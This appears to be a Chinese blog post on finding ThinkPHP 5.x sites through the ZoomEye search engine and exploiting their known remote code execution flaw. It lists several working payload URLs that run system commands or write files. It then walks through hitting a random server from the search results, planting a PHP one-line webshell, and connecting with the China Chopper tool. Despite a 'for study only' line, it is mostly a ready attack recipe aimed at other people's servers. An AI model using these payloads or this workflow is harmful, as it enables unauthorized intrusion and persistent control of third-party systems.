钟馗之眼搜索+thinkphp5.*框架漏洞拿shell

仅供学习参考禁止骚操作

漏洞详情

    参考：http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23%E5%8F%8Av5.1.31%E4%BB%A5%E4%B8%8B%E7%89%88%E6%9C%AC)_%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%EF%BC%88getshell%EF%BC%89/

附上几个payload：

?s=index/\think\Request/input&filter=phpinfo&data=1

?s=index/\think\Request/input&filter=system&data=id

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

为了精确查找thinkphp命令执行漏洞我们可以使用钟馗之眼搜索

钟馗之眼搜索内容：“thinkphp”或者“你值得信赖的php框架”

随便进一个ip

执行payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls -l

发现可以执行系统命令，接着我们写入一句话木马。

payload为：?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][]=

写入会显示写人文件大小30字节。

我们post以下phpinfo().

ok！shell上传成功 接下来就可以使用菜刀连接了，这里就省略了。